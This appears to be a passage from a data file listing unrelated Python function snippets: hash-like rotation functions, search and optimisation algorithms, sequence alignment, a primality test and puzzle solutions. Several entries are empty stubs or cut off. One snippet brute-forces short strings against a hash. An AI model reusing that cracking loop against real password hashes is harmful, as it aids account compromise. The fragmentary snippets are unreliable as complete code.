a = array[2]\n b = array[6]\n c = array[10]\n d = array[14]\n a1 = roll(a, 00) + roll(b, 00) + roll(b, 12) + roll(c, 12) + roll(d, 28) + roll(a, 28) + roll(b, 28)\n b1 = roll(b, 19) + roll(c, 19) + roll(d, 3) + roll(a, 3) + roll(b, 3) + roll(c, 7) + roll(d, 23) + roll(a,\n 23) + roll(\n b, 23) + roll(a, 15) + roll(b, 15) + roll(b, 27) + roll(c, 27) + roll(d, 11) + roll(a, 11) + roll(b, 11) + roll(\n d, 31) + roll(a, 31) + roll(b, 31)\n c1 = roll(c, 0) + roll(d, 16) + roll(a, 16) + roll(b, 16) + roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c,\n 20) + roll(\n d, 4) + roll(a, 4) + roll(b, 4) + roll(d, 24) + roll(a, 24) + roll(b, 24)\n d1 = roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c, 20) + roll(d, 4) + roll(a, 4) + roll(b, 4) + roll(d,\n 24) + roll(a,\n 24) + roll(\n b, 24)\n\n return array[0], array[1], a1, array[3], array[4], array[5], b1, array[7], array[8], array[9], c1, array[11], array[\n 12], array[13], d1, array[15]", "def solve_bruteforce(self):\n max_value = -1\n for z in range(0, self.k):\n max_value = -1\n max_index = -1\n for i, v in enumerate(self.numbers):\n if v > max_value:\n max_index = i\n max_value = v\n del self.numbers[max_index]\n\n return max_value", "def MINSTD(x):\n \n yield from lehmer(x,48271,2**31-1)", "def iterative_fuel(d):\n accumulator = d\n total = 0\n while True:\n accumulator = math.floor(accumulator / 3) - 2\n if accumulator < 0:\n return total\n total += accumulator", "def _SD_optimal(t):", "def q5(array):\n a = array[3]\n b = array[7]\n c = array[11]\n d = array[15]\n a1 = roll(a, 00) + roll(b, 00) + roll(b, 12) + roll(c, 12) + roll(d, 28) + roll(a, 28) + roll(b, 28)\n b1 = roll(b, 19) + roll(c, 19) + roll(d, 3) + roll(a, 3) + roll(b, 3) + roll(c, 7) + roll(d, 23) + roll(a,\n 23) + roll(\n b, 23) + roll(a, 15) + roll(b, 15) + roll(b, 27) + roll(c, 27) + roll(d, 11) + roll(a, 11) + roll(b, 11) + roll(\n d, 31) + roll(a, 31) + roll(b, 31)\n c1 = roll(c, 0) + roll(d, 16) + roll(a, 16) + roll(b, 16) + roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c,\n 20) + roll(\n d, 4) + roll(a, 4) + roll(b, 4) + roll(d, 24) + roll(a, 24) + roll(b, 24)\n d1 = roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c, 20) + roll(d, 4) + roll(a, 4) + roll(b, 4) + roll(d,\n 24) + roll(a,\n 24) + roll(\n b, 24)\n\n return array[0], array[1], array[2], a1, array[4], array[5], array[6], b1, array[8], array[9], array[10], c1, array[\n 12], array[13], array[14], d1", "def fn(k, i, j):\n if not (0 <= i < N and 0 <= j < N): return 0\n if k == 0: return 1 \n return 1/8*sum(fn(k-1, i+ii, j+jj) for ii, jj in ((-2, -1), (-2, 1), (-1, -2), (-1, 2), (1, -2), (1, 2), (2, -1), (2, 1)))", "def hillClimbingSearch_RR(problem, p, maxSteps, userInteraction, beQuiet):\n\n import random\n currentState = problem.state\n if not beQuiet:\n problem.visualize(currentState)\n steps = 0\n restarts=0\n bestYet = currentState\n\n # for visualization\n problem.hVals.append(problem.getObjValue(currentState))\n\n while steps<maxSteps:\n if problem.isGlobalOptimum(currentState):\n print(f\"\\nTotal random restarts done: {restarts}.\")\n return steps, bestYet\n if random.random()>=p:\n # make a greedy step\n neighbours = problem.getNeighbours(currentState)\n runningBest = currentState\n for n in neighbours:\n nObjVal = problem.getObjValue(n)\n runningBestVal = problem.getObjValue(runningBest)\n if problem.isBetter(nObjVal, runningBestVal):\n runningBest = n\n if runningBest is currentState:\n # no neighbour is better, check against the bestYet\n runningBestVal = problem.getObjValue(runningBest)\n bestYetVal = problem.getObjValue(bestYet)\n if problem.isBetter(runningBestVal, bestYetVal):\n bestYet = runningBest\n else:\n # jump to best neighbour\n currentState = runningBest\n\n # for visualization later on\n problem.hVals.append(problem.getObjValue(currentState))\n \n if not beQuiet:\n print(\"Greedy step taken.\")\n if userInteraction:\n input(\"Press enter to continue \")\n problem.visualize(currentState)\n currentVal = problem.getObjValue(currentState)\n bestYetVal = problem.getObjValue(bestYet)\n if problem.isBetter(currentVal, bestYetVal):\n bestYet = currentState\n steps+=1\n else:\n # do a random restart\n currentState = problem.getRandomState()\n \n # for visualization later on\n problem.hVals.append(problem.getObjValue(currentState))\n if not beQuiet:\n if userInteraction:\n input(\"Press enter to continue \")\n print(\"Random restart done.\")\n problem.visualize(currentState)\n \n currentVal = problem.getObjValue(currentState)\n bestYetVal = problem.getObjValue(bestYet)\n if problem.isBetter(currentVal, bestYetVal):\n bestYet = currentState\n \n restarts+=1\n steps+=1\n # after running out of steps, return the best yet state\n print(f\"\\n[INFO] Total number of random restarts done: {restarts}.\")\n return steps, bestYet", "def solution2(inp):\n inp = get_lines(inp)\n notes = inp[1].split(\",\")\n\n offsets = {}\n for i, bus in enumerate(notes):\n if bus == 'x':\n continue\n bus = int(bus)\n offsets[bus] = i\n buses = set(offsets)\n old_buses = buses.copy()\n\n def search(bus, offset, t):\n if (t + offset) % bus == 0:\n buses.remove(bus)\n if len(buses) == 0:\n return True\n new_bus = max(buses)\n return search(new_bus, offsets[new_bus], t)\n return False\n\n cbus = max(buses)\n max_bus = cbus\n s = 100_000_000_000_000\n s = 0\n s = s - s % cbus - offsets[cbus]\n delta = cbus\n stack = buses.copy()\n stack.remove(cbus)\n sec_max = max(stack)\n while not search(max_bus, offsets[max_bus], offsets[max_bus]):\n buses = old_buses.copy()\n s += delta\n if (s + offsets[sec_max]) % sec_max == 0:\n if len(stack) != 0:\n cbus = max(stack)\n stack.remove(cbus)\n if len(stack) != 0:\n sec_max = max(stack)\n else:\n return s\n delta *= cbus\n\n return s - offsets[max(offsets)]", "def am(n):\r\n for i in range(1,n+1):\r\n if i not in d1.keys() :\r\n d1[i] = d1[i-1] + (i*((-1)**i))\r\n# print(d1)\r\n else:\r\n pass\r\n return d1[n]", "def algorithm_loop(self):", "def hillClimbingSearch_S(problem, userInteraction, beQuiet):\n\n currentState = problem.state\n if not beQuiet:\n problem.visualize(currentState)\n\n # for visualization\n problem.hVals.append(problem.getObjValue(currentState))\n \n steps=0\n while True:\n if problem.isGlobalOptimum(currentState):\n return steps, currentState\n neighbours = problem.getNeighbours(currentState)\n runningBest = currentState\n for n in neighbours:\n nObjVal = problem.getObjValue(n)\n runningBestVal = problem.getObjValue(runningBest)\n if problem.isBetter(nObjVal, runningBestVal):\n runningBest = n\n\n if runningBest is currentState:\n # no neighbour is better, optimum reached\n return steps, currentState\n else:\n # jump to best neighbour\n currentState = runningBest\n\n # for visualization later on\n problem.hVals.append(problem.getObjValue(currentState))\n steps+=1\n if not beQuiet:\n if userInteraction:\n input(\"Press enter to continue \")\n problem.visualize(currentState)", "def levin(x):\n summ = 0\n for t, l in x: # for the time and length of each algorithm\n summ += l + np.log(t)\n return summ", "def one_backward_pass(t,states,init_vals,traces,delta,unit_cube,edges,P):\n \n next_vals = -1e100 * np.ones_like(init_vals)\n \n S,T = states.shape\n \n for i in range(len(states)):\n for j in range(len(unit_cube)):\n# print('State, unitcube subtracted',s,c)\n if (states[i] - unit_cube[j]).min() >= 0:\n \n state_idx = edges[i,j]\n \n tau = np.where(unit_cube[j] == 0)\n \n if len(tau[0]) == 0:\n next_vals[state_idx] = log_sum_exp([next_vals[state_idx],\\\n init_vals[i]+T*np.log(delta)])\n \n else:\n flag = 0\n temp = []\n for k in tau[0]:\n if (t-states[i,k] >=0 and t-states[i,k]< len(traces[k])):\n temp.append(traces[k][t-states[i][k]])\n else:\n flag = 1\n break\n\n if (len(set(temp)) == 1 and flag == 0):\n bit = temp[0]\n next_vals[state_idx] = log_sum_exp([next_vals[state_idx],init_vals[i]\\\n + (T-len(temp)) * np.log(delta)\\\n + np.log(1-delta) * (len(temp))\\\n + np.log(P[t,bit] + 1e-100)])\n \n return next_vals", "def main():\r\n for a in alpha:\r\n cmpHash(a)\r\n for l in alpha:\r\n cmpHash(a + l)\r\n for p in alpha:\r\n cmpHash(a + l + p)\r\n for h in alpha:\r\n cmpHash(a + l + p + h)\r\n for al in alpha:\r\n cmpHash(a + l + p + h + al)", "def _hill_diff(self, position):\n if position < 0:\n return 2 * position + 1\n else:\n return (1/math.sqrt(1 + 5 * position ** 2)\n - 5 * position ** 2 * (1 + 5 * position ** 2)**-1.5)", "def misplaced_heuristic(state):\n msp_h = 0\n size = len(state)\n for i in range (size):\n for j in range (size):\n if state[i][j] == 0:\n continue\n elif state[i][j] != i*size + j:\n msp_h += 1\n return msp_h", "def needleman_wunsch(x, y, lodict={}, gop=-2.5, gep=-1.75, local=False, indel=''):\n n, m = len(x), len(y)\n dp = np.zeros((n + 1, m + 1))\n pointers = np.zeros((n + 1, m + 1), np.int32)\n if not local:\n for i1, c1 in enumerate(x):\n if gop is None:\n dp[i1 + 1, 0] = lodict.get((c1, indel), gep)\n else:\n dp[i1 + 1, 0] = dp[i1, 0]+(gep if i1 + 1 > 1 else gop)\n pointers[i1 + 1, 0] = 1\n for i2, c2 in enumerate(y):\n if gop is None:\n dp[0, i2 + 1] = lodict.get((indel, c2), gep)\n else:\n dp[0, i2 + 1] = dp[0, i2]+(gep if i2 + 1 > 1 else gop)\n pointers[0, i2 + 1] = 2\n for i1, c1 in enumerate(x):\n for i2, c2 in enumerate(y):\n match = dp[i1, i2] + lodict.get(\n (c1, c2),\n 1 if c1 == c2 else -1)\n insert = dp[i1, i2 + 1] + (\n lodict.get((c1, indel), gep) if gop is None else\n gep if pointers[i1, i2 + 1] == 1 else gop)\n delet = dp[i1 + 1, i2] + (\n lodict.get((indel, c2), gep) if gop is None else\n gep if pointers[i1 + 1, i2] == 2 else gop)\n pointers[i1 + 1, i2 + 1] = p = np.argmax([match, insert, delet])\n max_score = [match, insert, delet][p]\n if local and max_score < 0:\n max_score = 0\n dp[i1 + 1, i2 + 1] = max_score\n alg = []\n if local:\n i, j = np.unravel_index(dp.argmax(), dp.shape)\n else:\n i, j = n, m\n score = dp[i, j]\n while (i > 0 or j > 0):\n pt = pointers[i, j]\n if pt == 0:\n i -= 1\n j -= 1\n alg = [(x[i], y[j])] + alg\n if pt == 1:\n i -= 1\n alg = [(x[i], indel)] + alg\n if pt == 2:\n j -= 1\n alg = [(indel, y[j])] + alg\n if local and dp[i, j] == 0:\n break\n return score, alg", "def clebsch(idx1, idx2, idx):\n fastcg = clebschSU2\n\n k1, n1, j1, m1 = idx1\n k2, n2, j2, m2 = idx2\n k, n, j, m = idx\n\n if int(2 * j1) not in range(abs(k1 - n1), k1 + n1 + 1, 2):\n print(idx1, idx2, idx)\n raise ValueError(\"Invalid value of l1\")\n if int(2 * j2) not in range(abs(k2 - n2), k2 + n2 + 1, 2):\n print(idx1, idx2, idx)\n raise ValueError(\"Invalid value of l2\")\n if int(2 * j) not in range(abs(k - n), k + n + 1, 2):\n print(idx1, idx2, idx)\n raise ValueError(\"Invalid value of l\")\n if m != m1 + m2:\n return 0\n\n H = sum(\n fastcg((k / 2, mm1 + mm2), (n / 2, m - mm1 - mm2), (j, m))\n * fastcg((k1 / 2, mm1), (k2 / 2, mm2), (k / 2, mm1 + mm2))\n * fastcg((n1 / 2, m1 - mm1), (n2 / 2, m2 - mm2), (n / 2, m - mm1 - mm2))\n * fastcg((k1 / 2, mm1), (n1 / 2, m1 - mm1), (j1, m1))\n * fastcg((k2 / 2, mm2), (n2 / 2, m2 - mm2), (j2, m2))\n for mm1 in (\n x / 2\n for x in set(range(-k1, k1 + 1, 2)).intersection(\n set(range(int(2 * m1 - n1), int(2 * m1 + n1 + 1), 2))\n )\n )\n for mm2 in (\n x / 2\n for x in set(range(-k2, k2 + 1, 2))\n .intersection(set(range(int(2 * m2 - n2), int(2 * m2 + n2 + 1), 2)))\n .intersection(\n set(range(int(2 * m - n - 2 * mm1), int(2 * m + n - 2 * mm1 + 1), 2))\n )\n .intersection(set(range(int(-k - 2 * mm1), int(k - 2 * mm1 + 1), 2)))\n )\n )\n return H", "def _build_downhill_matrices(self, weight=0.6667):\n\n from scipy import sparse as sparse\n \n\n down_neighbour = np.empty(self.tri.npoints, dtype=np.int)\n\n for node in range (0,self.tri.npoints):\n down_neighbour[node] = self.neighbour_array_lo_hi[node][0]\n\n # Build a matrix of downhill-ness - one entry per node ! \n \n size = self.tri.npoints\n row_array = np.empty(size, dtype = int)\n col_array = np.empty(size, dtype = int)\n down_array = np.ones(size)\n accu_array = np.ones(size)\n\n\n for row in range(0, self.tri.npoints): \n row_array[row] = row\n col_array[row] = down_neighbour[row]\n \n accuMCOO = sparse.coo_matrix( (accu_array, (row_array, col_array)), shape=(size,size) ).T \n\n self.accumulatorMat = accuMCOO.tocsr() \n\n self._build_adjacency_matrix_1()\n self._build_adjacency_matrix_2()\n \n self.downhillMat = weight * self.adjacency1 + (1.0-weight) * self.adjacency2\n\n # A1 = self.downhillMat\n # A2 = self.downhillMat.dot(self.downhillMat)\n # A2a = A1 + A2\n # A4 = A2.dot(A2)\n # A4a = A2a + A2.dot(A2a)\n # A8 = A4.dot(A4)\n # A8a = A4a + A4.dot(A4a)\n # A16 = A8.dot(A8)\n # A16a = A8a + A8.dot(A8a)\n\n # self.downhillMat16 = A16\n # self.downhillMat8 = A8\n # self.downhillMat16a = A16a\n # self.downhillMat8a = A8a\n\n # We make it optional to build these as they are not sparse \n # This cleans up previously stored matrices\n\n self.downhillCumulativeMat = None\n self.sweepDownToOutflowMat = None\n \n return", "def algorithm_h(n, m):\n partition = [1]*m\n partition[0] = n - m + 1\n\n while True:\n yield partition[:]\n if partition[1] < partition[0] - 1:\n partition[0] -= 1\n partition[1] += 1\n else:\n j = 2\n s = partition[0] + partition[1] - 1\n while j < m and partition[j] >= partition[0] - 1:\n s += partition[j]\n j += 1\n if j >= m:\n return\n replacement = partition[j] + 1\n partition[j] = replacement\n j -= 1\n while j > 0:\n partition[j] = replacement\n s -= replacement\n j -= 1\n partition[0] = s", "def q7(array):\n a = array[1]\n b = array[5]\n c = array[9]\n d = array[13]\n a1 = roll(a, 00) + roll(b, 00) + roll(b, 12) + roll(c, 12) + roll(d, 28) + roll(a, 28) + roll(b, 28)\n b1 = roll(b, 19) + roll(c, 19) + roll(d, 3) + roll(a, 3) + roll(b, 3) + roll(c, 7) + roll(d, 23) + roll(a,\n 23) + roll(\n b, 23) + roll(a, 15) + roll(b, 15) + roll(b, 27) + roll(c, 27) + roll(d, 11) + roll(a, 11) + roll(b, 11) + roll(\n d, 31) + roll(a, 31) + roll(b, 31)\n c1 = roll(c, 0) + roll(d, 16) + roll(a, 16) + roll(b, 16) + roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c,\n 20) + roll(\n d, 4) + roll(a, 4) + roll(b, 4) + roll(d, 24) + roll(a, 24) + roll(b, 24)\n d1 = roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c, 20) + roll(d, 4) + roll(a, 4) + roll(b, 4) + roll(d,\n 24) + roll(a,\n 24) + roll(\n b, 24)\n\n return array[0], a1, array[2], array[3], array[4], b1, array[6], array[7], array[8], c1, array[10], array[11], \\\n array[\n 12], d1, array[14], array[15]", "def alias_setup(probs):\n \"\"\"\n Algorithm: Vose's Alias Method\n http://www.keithschwarz.com/darts-dice-coins/\n \"\"\"\n K = len(probs)\n q = np.zeros(K)\n J = np.zeros(K, dtype=np.int)\n smaller = []\n larger = []\n \n for kk, prob in enumerate(probs):\n q[kk] = K*prob\n if q[kk] < 1.0:\n smaller.append(kk)\n else:\n larger.append(kk)\n \n while len(smaller) > 0 and len(larger) > 0:\n small = smaller.pop()\n large = larger.pop()\n \n J[small] = large\n q[large] = q[large] + q[small] - 1.0\n \n if q[large] < 1.0:\n smaller.append(large)\n else:\n larger.append(large)\n \n return J, q", "def _local_improvement(self, folded_design):\n differing_sites = _string_difference_indices(\n self.target.dot_bracket, folded_design\n )\n hamming_distances = []\n for mutation in product(\"AGCU\", repeat=len(differing_sites)):\n mutated = self.design.get_mutated(mutation, differing_sites)\n folded_mutated, _ = fold(mutated.primary)\n hamming_distance = hamming(folded_mutated, self.target.dot_bracket)\n hamming_distances.append(hamming_distance)\n if hamming_distance == 0: # For better timing results\n return 0\n return min(hamming_distances)", "def arbitrary_first_hinge(data):\n n, d = data[0].shape\n max_val = np.zeros((d))\n min_val = np.zeros((d))\n for i in range(d):\n max_val[i] = np.max(data[0][:,i])\n min_val[i] = np.min(data[0][:,i])\n Delta = np.zeros((d))\n no_suitable_hinge = True\n count = 0\n while no_suitable_hinge: # just some number as break criterion\n for i in range(d):\n rand_val = min_val[i]+(max_val[i]-min_val[i])*(2*np.random.rand(1)-1) #to avoid 0 and a value higher then 1 should cause no issue\n if rand_val == 0:\n rand_val = rand_val+0.1*min_val[i]\n Delta[i] = 1/rand_val\n count +=1\n Delta[0] = 0\n data_minus, data_plus = separate_data(data, Delta)\n if (data_minus[1].size > d*2) and (data_plus[1].size > d*2):\n break\n if count > 60:\n print('No initial hinge was found')\n break\n\n return data_plus, data_minus,Delta", "def uninformed_search(start, end, graph):\n\n class SearchNode():\n def __init__(self, step_cost, name, predecessor):\n self.path_cost = predecessor.path_cost + step_cost if predecessor is not None else 0\n self.step_cost = step_cost\n self.name = name\n self.predecessor = predecessor\n def __repr__(self):\n return self.predecessor.name + \"->\" + self.name + \"=\" + self.path_cost\n\n class Problem():\n def __init__(self, start, end, graph, goal_predicate):\n self.start = start\n self.end = end\n self.graph = graph\n self.is_goal = goal_predicate\n self.visited_nodes = []\n\n nodes_expanded = 0\n nodes_generated = 0\n max_nodes_in_memory = 0\n\n def tree_search(problem, fringe):\n nonlocal nodes_generated\n nonlocal nodes_expanded\n nonlocal max_nodes_in_memory\n\n # create the initial node\n nodes_generated = 1\n fringe = [SearchNode(0, problem.start, None)]\n\n while len(fringe) > 0:\n # keep track of some metrics\n max_nodes_in_memory = max(max_nodes_in_memory, len(fringe))\n nodes_expanded += 1\n\n node = fringe.pop(0)\n while node.name in problem.visited_nodes:\n # ran out of nodes in the fringe\n if len(fringe) == 0:\n return None\n\n node = fringe.pop(0)\n\n if problem.is_goal(node):\n return node\n \n # make sure we never visit this node again, since we'll be expanding it\n problem.visited_nodes.append(node.name)\n\n # keep the fringe sorted by the path cost\n fringe.extend(expand(node, problem))\n fringe = sorted(\n fringe, \n key=lambda node: node.path_cost\n )\n\n return None\n\n def expand(node, problem):\n nonlocal nodes_generated\n nodes = []\n for edge in problem.graph.edges(node.name):\n nodes.append(SearchNode(edge.weight, edge.destination, node))\n \n nodes_generated += len(nodes)\n return nodes\n\n initial_problem = Problem(start, end, graph, lambda x: x.name == end)\n result = tree_search(initial_problem, [])\n\n # convert the resulting nested structure into an actual path of (start, end, cost)\n def walk(node):\n pred = node.predecessor\n if pred is None:\n return []\n \n path = walk(pred)\n path.append((pred.name, node.name, node.step_cost))\n return path\n\n path = walk(result) if result is not None else None\n return (path, nodes_expanded, nodes_generated, max_nodes_in_memory)", "def f(x,time):\n ret = []\n for i in xrange(n):\n xd = s[i] - gamma[i]*x[i] + \\\n sum([abs(beta[i,j])*hill(x[j],beta[i,j],theta[0]) \\\n for j in xrange(n)])\n ret.append(xd)\n return ret", "def aks( n ):\n\n def aks_mod( polynomial , r ):\n \"\"\"\n This function is used in aks.\n polynomial modulo ( x^r - 1 )\n \"\"\"\n aks_mod = polynomial.coefficients\n total = aks_mod[ : r ]\n aks_mod = aks_mod[ r : ]\n while len(aks_mod) - 1 >= r :\n for i in range(r):\n total[i] += aks_mod[i]\n aks_mod = aks_mod[ r : ]\n for i in range(len(aks_mod)):\n total[i] += aks_mod[i]\n return array_poly_mod( total , polynomial.mod )\n\n lg = math.log( n , 2 )\n k = int( lg * lg )\n\n if arith1.powerDetection( n )[ 1 ] != 1: #Power Detection\n print(\" n is not prime \")\n return False\n\n start = 3\n while 1:\n d = arith1.gcd.gcd( start , n )\n if 1 < d < n:\n print(\"n is not prime\")\n return False\n x = n % start\n N = x\n for i in range( 1 , k + 1 ):\n if N == 1:\n break\n N = ( N * x ) % start\n if i == k:\n r = start\n break\n start += 1\n d = arith1.gcd.gcd( r , n )\n if 1 < d < n:\n print(\" n is not prime \")\n return False\n if n <= r:\n print(\" n is prime \")\n return True\n\n e = multiplicative.euler( r ) #Cyclotomic Conguence\n e = math.sqrt( e )\n e = int( e * lg )\n for b in range( 1 , e+1 ):\n f = array_poly_mod( [ b , 1 ] , n )\n total = array_poly_mod( [ 1 ] , n )\n count = n\n while count > 0:\n if count & 1:\n total = total * f\n total = aks_mod( total , r )\n f = f.power()\n f = aks_mod( f , r )\n count = count >> 1\n total_poly = total.coefficients_to_dict()\n if total_poly != { 0 : b , n % r : 1 }:\n print(\" n is not prime \")\n return False\n print(\" n is prime \")\n return True", "def beautifulSubsets(self, nums: List[int], k: int) -> int:\n\n \"\"\"\n queue = deque([([], -1)])\n res = 0\n\n while queue:\n cur, idx = queue.popleft()\n res += 1\n\n for i in range(idx + 1, len(nums)):\n if nums[i] - k in cur or nums[i] + k in cur:\n continue\n\n queue.append((cur + [nums[i]], i))\n\n return res - 1\n \"\"\"\n\n \"\"\"\n # dp0 is the ways that without A[i]\n # dp1 is the ways that with A[i]\n\n count = [Counter() for i in range(k)]\n for n in nums:\n count[n % k][n] += 1\n\n res = 1\n for i in range(k):\n prev, dp0, dp1 = 0, 1, 0\n for n in sorted(count[i]):\n v = pow(2, count[i][n])\n if prev + k == n:\n dp0, dp1 = dp0 + dp1, dp0 * (v - 1)\n else:\n dp0, dp1 = dp0 + dp1, (dp0 + dp1) * (v - 1)\n\n prev = n\n\n res *= dp0 + dp1\n\n return res - 1\n \"\"\"\n\n # Count the frequency of A, and then consider all the arithmetic sequence with difference k.\n # Each arithmetic sequence can be solve as a hourse robber problem.\n # We solve the hourse robber by dp.\n # dp(a) return the result for sequence no bigger than a.\n\n # dp(a)[0] is the ways that without a\n # dp(a)[1] is the ways that with a\n\n # dp(a)[0] = dp(a - k)[0] + dp(a - k)[1]\n # dp(a)[1] = dp(a - k)[0] * (2 ^ count(a) - 1\n\n count = Counter(nums)\n\n def dp(n):\n dp0, dp1 = dp(n - k) if n - k in count else (1, 0)\n return dp0 + dp1, dp0 * (pow(2, count[n]) - 1)\n\n return functools.reduce(operator.mul, (sum(dp(n)) for n in count if not count[n + k])) - 1", "def MINSTD0(x):\n \n yield from lehmer(x,16807,2**31-1)", "def solution(A, B):\n downstream = []\n survivor = []\n for i in range(0, len(A)):\n print(f'pass {i}')\n if B[i]: # If a fish is swimming downstream place him in that stack\n downstream.append(A[i])\n # print(f'survivor: <--{survivor}, downstream: {downstream}--> {A[i]} is A[{i}] -- Downstream encountered')\n continue\n elif downstream: # If the fish is swiming upstream and there are fish in the downstream \n while downstream:\n if downstream[-1] < A[i]: # This fish is compared to the downstream fish.\n # print(f'survivor: <--{survivor}, downstream: {downstream}--> {A[i]} is A[{i}]')\n downstream.pop()\n else:\n break # When this current fish is eaten by a downstream fish\n else: # All the downstream fish are eaten by the current upstream fish\n survivor.append(A[i])\n # print(f'survivor: <--{survivor}, downstream: {downstream}-->')\n else: # All the downstream fish are eaten\n survivor.append(A[i])\n # print(f'survivor: <--{survivor}, downstream: {downstream}-->')\n\n # print(f'survivor: <--{survivor}, downstream: {downstream}-->') \n return len(survivor+downstream)", "def euler39():\n\tcount = [0] * 1001\n\n\tfor a in range(1, 333):\n\t\tfor b in range(a+1, 500):\n\t\t\tc = (a**2 + b**2) ** 0.5\n\t\t\tp = a + b + int(c)\n\t\t\t\n\t\t\tif int(c) != c: continue\n\t\t\tif p > 1000: break\n\t\t\t\n\t\t\tcount[p] += 1\n\t\t\t\n\treturn count.index(max(count))", "def q4(array):\n a = array[0]\n b = array[5]\n c = array[10]\n d = array[15]\n a1 = roll(a, 00) + roll(b, 00) + roll(b, 12) + roll(c, 12) + roll(d, 28) + roll(a, 28) + roll(b, 28)\n b1 = roll(b, 19) + roll(c, 19) + roll(d, 3) + roll(a, 3) + roll(b, 3) + roll(c, 7) + roll(d, 23) + roll(a,\n 23) + roll(\n b, 23) + roll(a, 15) + roll(b, 15) + roll(b, 27) + roll(c, 27) + roll(d, 11) + roll(a, 11) + roll(b, 11) + roll(\n d, 31) + roll(a, 31) + roll(b, 31)\n c1 = roll(c, 0) + roll(d, 16) + roll(a, 16) + roll(b, 16) + roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c,\n 20) + roll(\n d, 4) + roll(a, 4) + roll(b, 4) + roll(d, 24) + roll(a, 24) + roll(b, 24)\n d1 = roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c, 20) + roll(d, 4) + roll(a, 4) + roll(b, 4) + roll(d,\n 24) + roll(a,\n 24) + roll(\n b, 24)\n\n return a1, array[1], array[2], array[3], array[4], b1, array[6], array[7], array[8], array[9], c1, array[11], array[\n 12], array[13], array[14], d1", "def q1(array):\n a = array[3]\n b = array[4]\n c = array[9]\n d = array[14]\n a1 = roll(a, 00) + roll(b, 00) + roll(b, 12) + roll(c, 12) + roll(d, 28) + roll(a, 28) + roll(b, 28)\n b1 = roll(b, 19) + roll(c, 19) + roll(d, 3) + roll(a, 3) + roll(b, 3) + roll(c, 7) + roll(d, 23) + roll(a,\n 23) + roll(\n b, 23) + roll(a, 15) + roll(b, 15) + roll(b, 27) + roll(c, 27) + roll(d, 11) + roll(a, 11) + roll(b, 11) + roll(\n d, 31) + roll(a, 31) + roll(b, 31)\n c1 = roll(c, 0) + roll(d, 16) + roll(a, 16) + roll(b, 16) + roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c,\n 20) + roll(\n d, 4) + roll(a, 4) + roll(b, 4) + roll(d, 24) + roll(a, 24) + roll(b, 24)\n d1 = roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c, 20) + roll(d, 4) + roll(a, 4) + roll(b, 4) + roll(d,\n 24) + roll(a,\n 24) + roll(\n b, 24)\n\n return array[0], array[1], array[2], a1, b1, array[5], array[6], array[7], array[8], c1, array[10], array[11], \\\n array[\n 12], array[13], d1, array[15]", "def alphabeta_search(state):\r\n \r\n '''\r\n Terminates when game.actions is empty\r\n Class Game needs the following functions:\r\n - game.result(state, a) -- successor\r\n - game.actions(state) -- possible moves\r\n - game.utility -- returns the state of the game (win/lose or tie, when game is terminal)\r\n \r\n '''\r\n #sort state.actions in increasing or decreasing based on max or min (alpha or beta)\r\n #use heuristics fn to get a value for each move (move is in format (x,y) where x and y are ints\r\n \r\n d = depthset[0] #this is the cutoff test depth value. if we exceed this value, stop\r\n cutoff_test=None\r\n sort_fn = [vitalpoint, eyeHeur]\r\n eval_fn = survivalheur \r\n #randnumheuristics \r\n player = state.to_move()\r\n prune = 0\r\n pruned = {} #this will store the depth of the prune\r\n totaldepth = [0]\r\n visited = {}\r\n heuristicInd = 0\r\n \r\n def max_value(state, alpha, beta, depth, heuristicInd):\r\n branches = len(state.actions())\r\n onbranch = 0\r\n \r\n if totaldepth[0] < depth:\r\n totaldepth[0] = depth\r\n if cutoff_test(state, depth):\r\n return eval_fn(state)\r\n v = -infinity\r\n \r\n #sort state.actions based on heuristics before calling\r\n #max wants decreasing\r\n #sorted(state.actions(), key = eval_sort, reverse = True)\r\n \r\n #sort by favorites first, returns a list of actions\r\n # for sorts in sort_fn:\r\n tempher = heuristicInd\r\n\r\n sorts = sort_fn[heuristicInd]\r\n sortedactions, heuristicInd = sorts(state)\r\n #if heuristicInd != tempher:\r\n # print 's',\r\n ''''''\r\n for a in sortedactions:\r\n if visited.get(depth) == None:\r\n visited[depth] = [a]\r\n else:\r\n visited[depth].append(a)\r\n \r\n onbranch += 1\r\n v = max(v, min_value(state.result(a),\r\n alpha, beta, depth+1, heuristicInd)) #+ vitscore.count(a)\r\n if v >= beta: #pruning happens here, but in branches\r\n if pruned.get(depth) == None:\r\n pruned[depth] = branches - onbranch\r\n else:\r\n pruned[depth] += (branches - onbranch)\r\n #print \"prune\", depth, \" \", state.actions()\r\n #state.display()\r\n return v\r\n alpha = max(alpha, v)\r\n \r\n #print depth, \" \", state.actions()\r\n #state.display()\r\n \r\n return v\r\n\r\n def min_value(state, alpha, beta, depth, heuristicInd):\r\n branches = len(state.actions())\r\n onbranch = 0\r\n \r\n if totaldepth[0] < depth:\r\n totaldepth[0] = depth\r\n if cutoff_test(state, depth):\r\n return eval_fn(state)\r\n v = infinity\r\n \r\n #sort state.actions based on heuristics before calling\r\n #min wants increasing\r\n #sorted(state.actions(), key = eval_sort)\r\n #Shayne\r\n tempher = heuristicInd\r\n sorts = sort_fn[heuristicInd]\r\n sortedactions, heuristicInd = sorts(state, 1)\r\n #if heuristicInd != tempher:\r\n # print 's',\r\n for a in sortedactions: #state.actions():\r\n onbranch += 1\r\n if visited.get(depth) == None:\r\n visited[depth] = [a]\r\n else:\r\n visited[depth].append(a)\r\n v = min(v, max_value(state.result(a),\r\n alpha, beta, depth+1, heuristicInd))\r\n if v <= alpha: #pruning happens here, but in branches\r\n if pruned.get(depth) == None:\r\n pruned[depth] = branches - onbranch\r\n else:\r\n pruned[depth] += (branches - onbranch)\r\n #print \"prune\", depth, \" \", state.actions()\r\n #state.display()\r\n return v\r\n beta = min(beta, v)\r\n #print depth, \" \", state.actions()\r\n #state.display()\r\n return v\r\n\r\n # Body of alphabeta_search starts here:\r\n #def cutoff_test and eval_fn \r\n cutoff_test = (cutoff_test or\r\n (lambda state,depth: depth>d or state.terminal_test()))\r\n eval_fn = eval_fn or (lambda state: state.utility(player))\r\n #by default, utility score is used\r\n \r\n \r\n #argmax goes through all the possible actions and \r\n # applies the alphabeta search onto all of 